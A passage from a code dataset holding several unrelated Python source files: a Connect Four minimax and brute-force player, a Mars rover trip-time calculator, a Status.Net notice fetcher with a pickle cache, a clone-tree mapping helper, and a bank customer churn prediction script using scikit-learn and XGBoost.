SearcherEvolution(args)\n Searcher.search()\n\nif __name__ == \"__main__\":\n main()","repo_name":"defineZYP/ADT","sub_path":"sasrec/evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":17544,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"} +{"seq_id":"42823203833","text":"# Author: Ruslan Huhko\n# For: CS Capstone - Fall 2021\n# Advisor: Dr. Michael J Reale\n# Contains gameplay algorithms:\n# - Random\n# - BruteForce\n# - Minimax\n\nimport random\nimport numpy as np\nimport truthtable\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport gameboard\nimport math\n\n\nclass Algorithm:\n\n def __init__(self, gameboard):\n self.gameboard = gameboard\n\n def random(self):\n # randomly selects one of the available locations until four in a row exists\n # returns int selection\n posList = self.checkAvailPos(self.gameboard, as_tuple=False)\n return random.choice(posList)\n\n def checkAvailPos(self, gameboard, as_tuple):\n # Returns list of available columns to choose from [0-6]\n # Or returns list of position coordinates held by either player\n posList = []\n rList = []\n yList = []\n for c in range(gameboard.shape[1]):\n for r in reversed(range(gameboard.shape[0])):\n if gameboard[r, c].isdigit():\n posList.append(int(c))\n break\n elif gameboard[r, c] == 'R':\n rList.append((r, c))\n elif gameboard[r, c] == 'Y':\n yList.append((r, c))\n\n if as_tuple:\n # Returns list of tuples for positions\n return rList, yList\n else:\n return posList\n\n def bruteForce(self, player):\n # Driver Code for Brute Force\n # Determines next position based on the least moves necessary to achieve a winning combination\n # Returns selection 0-6\n \"\"\"\n # Code using the Bruteforce Class\n bruteforce = BruteForce(self.gameboard)\n bruteforce.main(player)\n\n # For debugging\n bruteforce.printGraph()\n print(nx.info(bruteforce.graph))\n\n bruteforce.clearGraph()\n selection = bruteforce.returnSelection()\n # print(selection, \": Player\", player.playercolor)\n \"\"\"\n\n # Code using the bruteforce minimax\n bruteforce = Minimax(self.gameboard, depth=math.inf)\n playercolor = player.playercolor\n\n if playercolor == 'R':\n col, weight = bruteforce.bruteForce(self.gameboard, True, False)\n elif playercolor == 'Y':\n col, weight = bruteforce.bruteForce(self.gameboard, False, False)\n\n selection = col\n\n return selection\n\n def minimax(self, player):\n # Driver Code for Minimax\n # Returns selection 0-6\n minimax = Minimax(self.gameboard, depth=4)\n minimax.main(player)\n\n selection = minimax.returnSelection()\n return selection\n\n\nclass Minimax(Algorithm):\n\n def __init__(self, cur_gameboard, depth):\n self.gameboard = cur_gameboard.copy()\n self.depth = depth\n self.selection = None\n self.alpha = -math.inf\n self.beta = math.inf\n\n def getScore(self, gameboard, isMaximizingPlayer):\n # Sets weights/scores for nodes\n # Code recycled from truthtable.py\n\n if isMaximizingPlayer:\n player = 'R'\n opp_player = 'Y'\n elif not isMaximizingPlayer:\n player = 'Y'\n opp_player = 'R'\n\n score = 0\n\n templist = []\n\n # all horizontal positions\n for r in range(6):\n for c in range(4):\n horizontal = gameboard[r, c:(c + 4)]\n count = 0\n opp_count = 0\n for i in horizontal:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # all vertical positions\n for r in range(3):\n for c in range(7):\n vertical = gameboard[r:(r + 4), c]\n count = 0\n opp_count = 0\n for i in vertical:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # positive diagonal\n for r in range(3):\n for c in range(4):\n for i in range(4):\n truepos = gameboard[(r + 3 - i), (c + i)]\n templist.append(str(truepos))\n positive = np.array(templist)\n count = 0\n opp_count = 0\n for i in positive:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n templist.clear()\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # negative diagonal\n for r in range(3):\n for c in range(4):\n for i in range(4):\n truepos = gameboard[(r + i), (c + i)]\n templist.append(str(truepos))\n negative = np.array(templist)\n count = 0\n opp_count = 0\n for i in negative:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n templist.clear()\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n # Add more weight to center row\n # Done manually since not training\n for r in range(3):\n vertical = gameboard[r:(r + 4), 3]\n count = 0\n opp_count = 0\n for i in vertical:\n if i == player:\n count += 1\n elif i == opp_player:\n opp_count -= 1\n if count == 4:\n score += 100\n elif opp_count == 0:\n score += count\n if opp_count == 3:\n score -= 100\n else:\n score -= opp_count * 4\n\n if isMaximizingPlayer:\n return score\n elif not isMaximizingPlayer:\n return -score\n\n def recordMove(self, gameboard, player, column):\n # Records move in lowest row within given column\n # Code recycled from gameboard.py not to prevent continual creation of Gameboard objects\n\n for i in reversed(range(gameboard.shape[0])):\n if gameboard[i, column].isalpha():\n if i == 0:\n # Raises Error if the selected column is full\n raise ValueError\n else:\n continue\n else:\n gameboard[i, column] = player\n break\n return gameboard\n\n def minimax(self, board, depth, isMaximizingPlayer, alpha, beta):\n # https://www.geeksforgeeks.org/minimax-algorithm-in-game-theory-set-4-alpha-beta-pruning/\n # Red is always maximizing player\n # Yellow is always minimizing player\n\n availCol = self.checkAvailPos(board, as_tuple=False)\n if len(availCol) == 0:\n return None, None\n col = availCol[0] # Default Value\n\n if depth == 0:\n return None, self.getScore(board, isMaximizingPlayer)\n\n if isMaximizingPlayer:\n max_val = -math.inf\n for c in availCol:\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'R', c)\n opp_col, score = self.minimax(board_copy, (depth - 1), False, alpha, beta)\n if score > max_val:\n max_val = score\n col = c\n alpha = max(alpha, max_val)\n if alpha >= beta:\n break\n return col, max_val\n elif not isMaximizingPlayer:\n min_val = math.inf\n for c in availCol:\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'Y', c)\n opp_col, score = self.minimax(board_copy, (depth - 1), True, alpha, beta)\n if score < min_val:\n min_val = score\n col = c\n beta = min(beta, min_val)\n if alpha >= beta:\n break\n return col, min_val\n\n def bruteForce(self, board, isMaximizingPlayer, isFinalMove):\n # BruteForce Approach\n # Basically Minimax without depth limit, and alpha-beta pruning\n # Red is always maximizing player\n # Yellow is always minimizing player\n\n availCol = self.checkAvailPos(board, as_tuple=False)\n\n if isFinalMove:\n return None, self.getScore(board, isMaximizingPlayer)\n\n if len(availCol) == 0:\n # Board is complete\n return None, self.getScore(board, isMaximizingPlayer)\n col = availCol[0] # Default Value\n\n if isMaximizingPlayer:\n max_val = -math.inf\n for col in range(len(availCol)):\n c = availCol[col]\n if col == len(availCol):\n isFinalMove = True\n else:\n isFinalMove = False\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'R', c)\n opp_col, score = self.bruteForce(board_copy, False, isFinalMove)\n if score > max_val:\n max_val = score\n col = c\n # alpha = max(alpha, max_val)\n # if alpha >= beta:\n # break\n return col, max_val\n elif not isMaximizingPlayer:\n min_val = math.inf\n for col in range(len(availCol)):\n c = availCol[col]\n if col == len(availCol):\n isFinalMove = True\n else:\n isFinalMove = False\n board_copy = board.copy() # because python passes by reference\n board_copy = self.recordMove(board_copy, 'Y', c)\n opp_col, score = self.bruteForce(board_copy, True, isFinalMove)\n if score < min_val:\n min_val = score\n col = c\n # beta = min(beta, min_val)\n # if alpha >= beta:\n # break\n return col, min_val\n\n def returnSelection(self):\n return self.selection\n\n def main(self, player):\n # Driver Code for this class\n playercolor = player.playercolor\n\n if playercolor == 'R':\n col, weight = self.minimax(self.gameboard, self.depth, True, self.alpha, self.beta)\n elif playercolor == 'Y':\n col, weight = self.minimax(self.gameboard, self.depth, False, self.alpha, self.beta)\n\n self.selection = col\n\n return\n\n\nclass BruteForce(Algorithm):\n\n def __init__(self, cur_gameboard):\n self.graph = nx.MultiGraph()\n self.gameboard = cur_gameboard\n self.truthtable = truthtable.TruthTable()\n self.gameboardTemplate = np.arange(42).reshape(6, 7)\n self.selection = None\n self.player = None\n self.board = gameboard.GameBoard()\n\n # Begins with each player having own array of potential winning combinations\n self.rTruth = self.truthtable.returntruthtable()\n self.yTruth = self.truthtable.returntruthtable()\n self.truthTableArray = self.truthtable.returntruthtable()\n\n def choosePath(self):\n # Iterates over graph to find the best path\n # Returns list of nodes for path\n possible_paths = []\n\n # Traverse possible paths\n for path_array in self.truthTableArray:\n # connvert path array into list\n path = path_array.tolist()\n\n try:\n if nx.is_path(self.graph, path):\n possible_paths.append(path)\n except KeyError:\n pass\n\n # find the weights for the paths\n weights = []\n for path in possible_paths:\n weights.append(nx.path_weight(self.graph, path, weight=\"weight\"))\n\n # Choose the path with the lowest weight\n # If multiple paths with lowest weight, chooses the first to be tested\n lowest_weight = 100\n lowest_weight_pos = None\n for i in range(len(weights)):\n weight = weights[i]\n if weight < lowest_weight:\n lowest_weight = weight\n lowest_weight_pos = i\n\n # Choose path with the lowest weight\n best_path = possible_paths[lowest_weight_pos]\n\n return best_path\n\n def returnSelection(self):\n # Returns Next Selection\n # Takes position number and converts to column number\n for r in range(self.gameboardTemplate.shape[0]):\n for c in range(self.gameboardTemplate.shape[1]):\n if self.selection == self.gameboardTemplate[r, c]:\n return c\n return None\n\n def curPositions(self, curList, oppList):\n # Converts list of tuples into list of positions [0-41]\n curPos = []\n\n for pos in curList:\n r, c = pos\n curPos.append(self.gameboardTemplate[r, c])\n # List of Positions taken by opponent\n oppPos = []\n for pos in oppList:\n r, c = pos\n oppPos.append(self.gameboardTemplate[r, c])\n\n return curPos, oppPos\n\n def getNextAvailPos(self, board):\n # Get next available positions\n # If column is full, sets 9 for row\n # Returns array of coordinates for next available positions\n nextAvailPos = np.zeros((board.shape[1], 2), dtype=int)\n for c in range(board.shape[1]):\n nextAvailPos[c, 1] = c\n for r in range(board.shape[0]):\n if board[r, c].isalpha():\n if r == 0:\n # Column is full\n nextAvailPos[c, 0] = 9 # Number is out of bounds\n break\n else:\n if nextAvailPos[c, 0] < r:\n nextAvailPos[c, 0] = r\n return nextAvailPos\n\n def takenByOpp(self, pos, oppPosList):\n # Checks if position in question is an available option\n for opp in oppPosList:\n if pos == opp:\n return True\n return False\n\n def adjacentPositions(self, templatePosNumber):\n # returns list of all adjacent position numbers\n # Determine location of current position\n loc = np.where(self.gameboardTemplate == templatePosNumber)\n r, c = loc\n r = int(r)\n c = int(c)\n\n adjList = []\n try:\n if (c - 1) < 0:\n raise IndexError\n l = self.gameboardTemplate[r, c - 1]\n adjList.append(l)\n except IndexError:\n pass\n try:\n if ((r - 1) < 0) or ((c - 1) < 0):\n raise IndexError\n nd = self.gameboardTemplate[r - 1, c - 1]\n adjList.append(nd)\n except IndexError:\n pass\n try:\n if (r - 1) < 0:\n raise IndexError\n v = self.gameboardTemplate[r - 1, c]\n adjList.append(v)\n except IndexError:\n pass\n try:\n if (r - 1) < 0:\n raise IndexError\n pd = self.gameboardTemplate[r - 1, c + 1]\n adjList.append(pd)\n except IndexError:\n pass\n try:\n r = self.gameboardTemplate[r, c + 1]\n adjList.append(r)\n except IndexError:\n pass\n try:\n nnd = self.gameboardTemplate[r + 1, c + 1]\n adjList.append(nnd)\n except IndexError:\n pass\n try:\n nv = self.gameboardTemplate[r + 1, c]\n adjList.append(nv)\n except IndexError:\n pass\n try:\n if (c - 1) < 0:\n raise IndexError\n npd = self.gameboardTemplate[r + 1, c - 1]\n adjList.append(npd)\n except IndexError:\n pass\n\n return adjList\n\n def addEdges(self, curList, oppList):\n # Creates the graph\n # Connects the nodes for potential moves\n curPos, oppPos = self.curPositions(curList, oppList)\n\n # Connect existing nodes using curPos\n for pos in curPos:\n\n # Determine adjacent positions\n test_list = self.adjacentPositions(pos)\n\n # Check list against opponent's positions\n to_del = []\n for testpos in oppPos:\n for adj in test_list:\n if adj == testpos:\n to_del.append(adj)\n for i in to_del:\n test_list.remove(i)\n\n # Add Existing Edges\n for testpos in curPos:\n for adj in test_list:\n if adj == testpos:\n self.graph.add_edge(pos, adj, weight=0)\n\n # Create Board for potential moves\n self.board.gameboard = self.gameboard.copy()\n\n # Create Graph\n weight_counter = 0\n no_more_moves = False\n while not no_more_moves:\n weight_counter += 1\n # Get Coordinates for Next Available Positions\n nextAvailPos = self.getNextAvailPos(self.board.gameboard)\n\n # Check if all columns are full\n # Remove elements of array that are out of bounds\n to_del = []\n for i in range(nextAvailPos.shape[0]):\n r, c = nextAvailPos[i]\n if r == 9:\n to_del.append(i)\n # Break Condition\n if len(to_del) == nextAvailPos.shape[0]:\n no_more_moves = True\n break\n else:\n for i in reversed(to_del):\n nextAvailPos = np.delete(nextAvailPos, i, axis=0)\n\n # Connect Edges to Next Available Positions\n for coord in nextAvailPos:\n r, c = coord\n pos = self.gameboardTemplate[r, c]\n\n # Determine adjacent positions\n adj_list = self.adjacentPositions(pos)\n\n # Check list against opponent's positions\n to_del = []\n for testpos in oppPos:\n for adj in adj_list:\n if adj == testpos:\n to_del.append(adj)\n for i in to_del:\n adj_list.remove(i)\n\n # Add Edges\n for adj_pos in adj_list:\n self.graph.add_edge(pos, adj_pos, weight=weight_counter)\n\n # Update theoretical gameboard\n try:\n self.board.recordMove(self.player, c)\n except ValueError:\n pass\n\n def printGraph(self):\n # Saves and displays the graph for the next possible move\n # Uses whichever graph was saved last\n # Detailed/labelled graph requires too much memory\n nx.draw(self.graph)\n plt.savefig(\"BruteForceGraph.png\")\n plt.show()\n\n def clearGraph(self):\n # Graph Destructor Method\n # Clears the Graph\n # Not included in main method, so the printGraph method can still be called\n self.graph.clear_edges()\n\n def main(self, player):\n # Brute Force Selection\n # Determines next position based on the least moves necessary to achieve a winning combination\n self.player = player\n rPos, yPos = self.checkAvailPos(self.gameboard, as_tuple=True)\n\n # Create Graph of possible winning combinations\n if player.playercolor == 'R':\n self.addEdges(rPos, yPos)\n\n elif player.playercolor == 'Y':\n self.addEdges(yPos, rPos)\n\n # Do Bruteforce\n selected_path = self.choosePath()\n\n # Paths should already be sorted\n self.selection = selected_path[0]\n\n","repo_name":"rhuhko/connectFourCapstone21","sub_path":"algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":20924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12652812193","text":"#!/usr/bin/env python3\n\nimport json\nimport math\n\ndef calc_gcd(latitude_1: float, longitude_1: float, latitude_2: float, longitude_2: float, radius:float) -> float:\n \"\"\"\n This function was written by Joe Wallen. Modifies to remove global variables and make it applicable to a planent\n of any radius.\n\n Arguments:\n latitude_1 (float): latitude at which the robot starts its journey.\n latitude_2 (float): latitude at which the robot ends its journey.\n longitude_1 (float): longitude at which the robot starts its journey.\n longitude_2 (float): longitude at which the robot ends its journey.\n radius (float): the radius of the planet the robot is traversing.\n\n Returns:\n distance (float): the distance that a robot has to travel to get between two (lat, long) points.\n \"\"\"\n\n lat1, lon1, lat2, lon2 = map( math.radians, [latitude_1, longitude_1, latitude_2, longitude_2] )\n d_sigma = math.acos( math.sin(lat1) * math.sin(lat2) + math.cos(lat1) * math.cos(lat2) * math.cos(abs(lon1-lon2)))\n return ( radius * d_sigma )\n\ndef composition_sample_time(comp: str) -> int:\n \"\"\"\n This function assigns the time it takes to sample a given landing site composition.\n\n Arugments:\n comp (str): composition of the landing site concerned.\n \n Returns: \n sampling time (int): time it takes to collect a sample from the input composition.\n \"\"\"\n\n if comp == 'stony':\n return 1\n if comp == 'iron':\n return 2\n if comp == 'stony-iron':\n return 3\n\ndef main():\n \"\"\"\n This function reads in the JSON file generated by generate_sites.py and calculates the number of legs in the trip\n (hard-coded to five, in this instance) and the total time it takes to complete each leg and the trip as a whole.\n \"\"\"\n\n mars_radius = 3389.5 # km\n\n with open('landing_sites.json', 'r') as f:\n data = json.load(f)\n \n lat1 = 16.0\n lon1 = 82.0\n max_speed = 10 # km / hr\n\n legs = []\n\n for i in range(len(data['sites'])):\n temp = {}\n temp['leg'] = i+1\n lat2 = data['sites'][i]['latitude']\n lon2 = data['sites'][i]['longitude']\n dist = calc_gcd(lat1, lon1, lat2, lon2, mars_radius)\n temp['time to travel'] = dist / max_speed\n temp['time to sample'] = composition_sample_time(data['sites'][i]['composition'])\n legs.append(temp)\n\n total_time = 0\n for i in range(len(legs)):\n print(f'leg = {legs[i][\"leg\"]}, time to travel = {round(legs[i][\"time to travel\"], 2)} hr, time to sample = {legs[i][\"time to sample\"]} hr')\n total_time += legs[i]['time to travel'] + legs[i]['time to sample']\n\n print('===============================')\n print(f'number of legs = {len(legs)}, total time elapsed = {total_time} hr')\n\nif __name__ == '__main__':\n main()\n","repo_name":"lajoiekatelyn/coe322-hw","sub_path":"homework02/calculate_trip.py","file_name":"calculate_trip.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36859350095","text":"#!/usr/bin/env python\n\"\"\"Functions for getting Status.Net users' notices.\"\"\"\nimport requests, os, sys, pickle\n\n\ndef fetch_notices(username, host, use_https=False):\n \"\"\"Fetches all notices for a given user at a given host.\"\"\"\n last_id = 0\n notices = {}\n while True:\n try:\n new_notices = requests.get(\"{protocol}://{host}/api/statuses/user_timeline.json\".format(\n protocol=\"https\" if use_https else \"http\",\n host=host),\n params={\n \"screen_name\": username,\n \"max_id\": str(last_id - 1)\n })\n except requests.exceptions.ConnectionError:\n sys.stderr.write(\"GET failed with a connection error. Aborting \" +\n \"prematurely.\\n\")\n break\n\n if new_notices.status_code == 200:\n new_notice_data = new_notices.json()\n elif (new_notices.status_code >= 400) and (new_notices.status_code <\n 500):\n sys.stderr.write(\"GET failed with a 4xx error. Aborting \" +\n \"prematurely.\\n\")\n break\n else:\n sys.stderr.write(\"GET failed. If you're seeing this a lot, something may be wrong.\\n\")\n continue\n\n if new_notice_data == []:\n break\n else:\n for notice in new_notice_data:\n notices[int(notice[\"id\"])] = notice[\"text\"]\n last_id = int(notice[\"id\"])\n\n if last_id == 1:\n break # Just fetched id 1. Done either way.\n\n return list(notices.values())\n\n\ndef get_notices(username, host, use_https=False, force_fetch=False):\n \"\"\"Gets all notices for a given user at a given host. Will attempt to read\n from cache if possible, otherwise pass through to fetch_notices.\"\"\"\n if not force_fetch:\n try:\n with open(\"{0}/{1}.picklejar\".format(host, username), \"rb\") as picklejar:\n return pickle.load(picklejar)\n except IOError: # file bad or nonexistent\n pass # so we'll fetch\n\n notices = fetch_notices(username, host, use_https)\n\n try:\n os.mkdir(host)\n except OSError:\n pass # Directory already exists, don't care.\n try:\n with open(\"{0}/{1}.picklejar\".format(host, username), \"wb\") as picklejar:\n pickle.dump(notices, picklejar)\n except IOError:\n sys.stderr.write(\"WARNING: Couldn't pickle notices. The script will\" +\n \" most likely still work, but this may result in inefficient\" +\n \" operation.\\n\")\n\n return notices\n","repo_name":"jesskay/markov-statusnet","sub_path":"notices.py","file_name":"notices.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9129479777","text":"# checks if a clone tree is the same as the state tree\n\ndef is_valid_tree(clone_tree, state_tree):\n return sorted(clone_tree) == sorted(state_tree)\n\n#converts all clone tree to the state tree\ndef map_clone_trees(all_clone_trees, cn_clones):\n output = []\n for tree in all_clone_trees:\n updated_tree = []\n for edge in tree:\n updated_edge = []\n for i in range(2):\n updated_edge.append(cn_clones[edge[i]])\n updated_tree.append(updated_edge)\n output.append(updated_tree)\n return output\n\n#converts a single clone tree to the state tree\ndef map_single_clone_tree(clone_tree, cn_clones):\n output = []\n updated_tree = []\n for edge in clone_tree:\n updated_edge = []\n for i in range(2):\n updated_edge.append(cn_clones[edge[i]])\n updated_tree.append(updated_edge)\n output.append(updated_tree)\n return output","repo_name":"kctsai03/decifer_analysis","sub_path":"src/check_tree.py","file_name":"check_tree.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36108073513","text":"#\n# We aim to accomplist the following for this study:\n#\n# 1.Identify and visualize which factors contribute to customer churn:\n#\n# 2.Build a prediction model that will perform the following:\n#\n# =>Classify if a customer is going to churn or not\n# =>Preferably and based on model performance, choose a model that will attach a probability to the churn to make it easier for customer service to target low hanging fruits in their efforts to prevent churn\n#\n\n\n\n# https://www.kaggle.com/nasirislamsujan/bank-customer-churn-prediction\n#For data wragling\nimport numpy as np # For data manipulation\nimport pandas as pd # For data representation# For data representation\n\n#For data visualization\nimport matplotlib.pyplot as plt # For basic visualization\nimport seaborn as sns # For synthetic visualization\n\n\n# from sklearn.cross_validation import train_test_split # For splitting the data into training and testing\n# from sklearn.cross_validation import train_test_split\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier # K neighbors classification model\nfrom sklearn.naive_bayes import GaussianNB # Gaussian Naive bayes classification model\nfrom sklearn.svm import SVC # Support Vector Classifier model\nfrom sklearn.tree import DecisionTreeClassifier # Decision Tree Classifier model\nfrom sklearn.linear_model import LogisticRegression # Logistic Regression model\nfrom sklearn.ensemble import RandomForestClassifier # Random Forest Classifier model\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, \\\n f1_score, average_precision_score, confusion_matrix, roc_curve, \\\n roc_auc_score # For checking the accuracy of the model\n\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler, StandardScaler\n\n\nfrom xgboost import XGBClassifier, plot_importance\nfrom imblearn.over_sampling import SMOTE\n\n#Read the DataFrame\ndf=pd.read_csv('Churn_Modelling.csv')\nprint(df.info())\nprint(df.head())\nprint(df.shape)\nprint(df.isnull().sum()) # Check columns list and missing values\nprint(df.describe())\n\nprint(df.dtypes)\n\nprint(df.nunique()) # Get unique count for each variable\n\n#drop unnecessary columns\n\ndf = df.drop([\"RowNumber\", \"CustomerId\", \"Surname\"], axis = 1)\n\n\n# Exploratory data analysis\n#\n# # count distribution of a categorical variable\n# df[\"Age\"].value_counts().plot.bar(figsize=(20,6))\n#\n#\n# #count distribution of a continuous variable\n# facet = sns.FacetGrid(df, hue=\"Exited\",aspect=3)\n# facet.map(sns.kdeplot,\"Age\",shade= True)\n# facet.set(xlim=(0, df[\"Age\"].max()))\n# facet.add_legend()\n#\n# plt.show()\n#\n#\n# #Pie chart. Proportion of customer churned and retained\n# labels = 'Exited', 'Retained'\n# sizes = [df.Exited[df['Exited']==1].count(), df.Exited[df['Exited']==0].count()]\n# explode = (0, 0.1)\n# fig1, ax1 = plt.subplots(figsize=(10, 8))\n# ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',\n# shadow=True, startangle=90)\n# ax1.axis('equal')\n# plt.title(\"Proportion of customer churned and retained\", size = 20)\n# plt.show()\n# #Output: 20.4% Exited and 79.6% Retained. This means unbalanced data\n#\n#\n#\n# #Bar chart. Frequency distribution of Exited column by Geography,Gender,HasCrCard,IsActiveMember\n# fig, axarr = plt.subplots(2, 2, figsize=(20, 12))\n# sns.countplot(x='Geography', hue='Exited', data=df, ax=axarr[0][0])\n# sns.countplot(x='Gender', hue='Exited', data=df, ax=axarr[0][1])\n# sns.countplot(x='HasCrCard', hue='Exited', data=df, ax=axarr[1][0])\n# sns.countplot(x='IsActiveMember', hue='Exited', data=df, ax=axarr[1][1])\n# plt.show()\n#\n#\n#\n# # Box-plot. Relations based on the continuous data attributes\n# fig, axarr = plt.subplots(3, 2, figsize=(20, 12))\n# sns.boxplot(y='CreditScore',x = 'Exited', hue = 'Exited',data = df, ax=axarr[0][0])\n# sns.boxplot(y='Age',x = 'Exited', hue = 'Exited',data = df , ax=axarr[0][1])\n# sns.boxplot(y='Tenure',x = 'Exited', hue = 'Exited',data = df, ax=axarr[1][0])\n# sns.boxplot(y='Balance',x = 'Exited', hue = 'Exited',data = df, ax=axarr[1][1])\n# sns.boxplot(y='NumOfProducts',x = 'Exited', hue = 'Exited',data = df, ax=axarr[2][0])\n# sns.boxplot(y='EstimatedSalary',x = 'Exited', hue = 'Exited',data = df, ax=axarr[2][1])\n# plt.show()\n#\n#\n# # Creating a pivot table demonstrating the percentile Of different genders and geographical regions in exiting the bank\n# visualization_1 = df.pivot_table(\"Exited\", index=\"Gender\", columns=\"Geography\")\n# print(visualization_1)\n#\n# #\n# # #Customer with 3 or 4 products are higher chances to Churn.Analysed through swarmplot\n# # fig, axarr = plt.subplots(3, 2, figsize=(20, 12))\n# # # plt.subplots_adjust(wspace=0.3)\n# # sns.swarmplot(x = \"NumOfProducts\", y = \"Age\", hue=\"Exited\", data = df, ax= axarr[0][0])\n# # sns.swarmplot(x = \"HasCrCard\", y = \"Age\", data = df, hue=\"Exited\", ax = axarr[0][1])\n# # sns.swarmplot(x = \"IsActiveMember\", y = \"Age\", hue=\"Exited\", data = df, ax = axarr[1][0])\n# # plt.show()\n#\n#\n# #Scatter-plot. categorical vs continuous variable distribution\n# _, ax = plt.subplots(1, 2, figsize=(15, 7))\n# cmap = sns.cubehelix_palette(light=1, as_cmap=True)\n# sns.scatterplot(x = \"Age\", y = \"Balance\", hue = \"Exited\", cmap = cmap, sizes = (10, 200), data = df, ax=ax[0])\n# sns.scatterplot(x = \"Age\", y = \"CreditScore\", hue = \"Exited\", cmap = cmap, sizes = (10, 200), data = df, ax=ax[1])\n# plt.show()\n# #interpertation:\n# # 1.40 to 70 years old customers are higher chances to churn\n# # 2.Customer with CreditScore less then 400 are higher chances to churn\n#\n#\n# #swarmplot. descrete vs descrete variable\n# plt.figure(figsize=(8, 8))\n# sns.swarmplot(x = \"HasCrCard\", y = \"Age\", data = df, hue=\"Exited\")\n# plt.show()\n#\n#\n# #Detecting outliers using boxplot\n# plt.figure(figsize=(12,6))\n# bplot = df.boxplot(patch_artist=True)\n# plt.xticks(rotation=90)\n# plt.show()\n#\n# #checking correlation\n# plt.subplots(figsize=(11,8))\n# sns.heatmap(df.corr(), annot=True, cmap=\"RdYlBu\")\n# plt.show()\n\n\n#Predictive model building\n\n # Shuffling the dataset\nchurn_dataset = df.reindex(np.random.permutation(df.index))\n\n # Splitting feature data from the target\ndata = churn_dataset.drop(\"Exited\", axis=1)\ntarget = churn_dataset[\"Exited\"]\n\n #Scale contiuous variables\nscaler = MinMaxScaler()\n\nbumpy_features = [\"CreditScore\", \"Age\", \"Balance\",'EstimatedSalary']\n\ndf_scaled = pd.DataFrame(data = data)\ndf_scaled[bumpy_features] = scaler.fit_transform(data[bumpy_features])\n\ndf_scaled.head()\n\nX = df_scaled\n# X=data\n\n # code categorical variable values into numerical values.solves ValueError: could not convert string to float: 'Spain'\nencoder = LabelEncoder()\nX[\"Geography\"] = encoder.fit_transform(X[\"Geography\"])\nX[\"Gender\"] = encoder.fit_transform(X[\"Gender\"])\n\n #else u can use one-hot encoding\n # list_cat = ['geography', 'gender']\n # training_data = pd.get_dummies(training_data, columns = list_cat, prefix = list_cat)\n\n\n # Splitting feature data and target into training and testing\nX_train, X_test, y_train, y_test = train_test_split(X, target, test_size=0.2, random_state=0)\n\n # Creating a python list containing all defined models\nmodel = [GaussianNB(), KNeighborsClassifier(), SVC(), DecisionTreeClassifier(), RandomForestClassifier(n_estimators=5, random_state=0), LogisticRegression()]\nmodel_names = [\"Gaussian Naive bayes\", \"K-nearest neighbors\", \"Support vector classifier\", \"Decision tree classifier\", \"Random Forest\", \"Logistic Regression\",]\nfor i in range(0, 6):\n y_pred =model[i].fit(X_train, y_train).predict(X_test)\n accuracy = accuracy_score(y_pred, y_test)*100\n print(model_names[i], \":\", accuracy, \"%\")\n\n\n\n\n\n # Working with the selected model\nmodel = RandomForestClassifier(n_estimators = 100, random_state = 0)\ny_pred = model.fit(X_train, y_train).predict(X_test)\nprint(\"Our accuracy is:\", accuracy_score(y_pred, y_test)*100, \"%\")\n\n\nclf = XGBClassifier(max_depth = 10,random_state = 10, n_estimators=220, eval_metric = 'auc', min_child_weight = 3,\n colsample_bytree = 0.75, subsample= 0.9)\n\nclf.fit(X_train, y_train)\npred = clf.predict(X_test)\naccuracy_score(pred, y_test)\n\n\n#Working with unbalanced data - Over Sampling\n\nsm = SMOTE(random_state=42)\nX_res, y_res = sm.fit_sample(X, target)\nX_train, X_test, y_train, y_test = train_test_split(X_res, y_res, test_size= 0.2, random_state=7)\n\nclf = XGBClassifier(max_depth = 12,random_state=7, n_estimators=100, eval_metric = 'auc', min_child_weight = 3,\n colsample_bytree = 0.75, subsample= 0.8)\nclf.fit(X_train, y_train)\n\ny_pred = clf.predict(X_test)\nprint(\"Accuracy:\", accuracy_score(y_test, y_pred))\nprint(\"Precision:\", precision_score(y_test, y_pred))\nprint(\"Recall:\", recall_score(y_test, y_pred))\nprint(\"F1:\", f1_score(y_test, y_pred))\nprint(\"Area under precision (AUC) Recall:\", average_precision_score(y_test, y_pred))\n\n#confusion matrix (true positive,true negative,false positive,false negative count)\nprint(confusion_matrix(y_test, y_pred))\n\n\n# https://machinelearningmastery.com/how-to-score-probability-predictions-in-python/\n# three scoring methods that you can use to evaluate the predicted probabilities on your classification predictive modeling problem.\n\n# log loss score - heavily penalizes predicted probabilities far away from their expected value.\n# Brier score - penalizes proportional to the distance from the expected value.\n# area under ROC curve - summarizes the likelihood of the model predicting a higher probability for true positive cases than true negative cases\n#\n\n# Log Loss\n# ---------\n# Log loss, also called “logistic loss,” “logarithmic loss,” or “cross entropy” can be used as a measure for evaluating predicted probabilities.\n# Each predicted probability is compared to the actual class output value (0 or 1) and a score is calculated that penalizes the probability based on the distance from the expected value.\n# The penalty is logarithmic, offering a small score for small differences 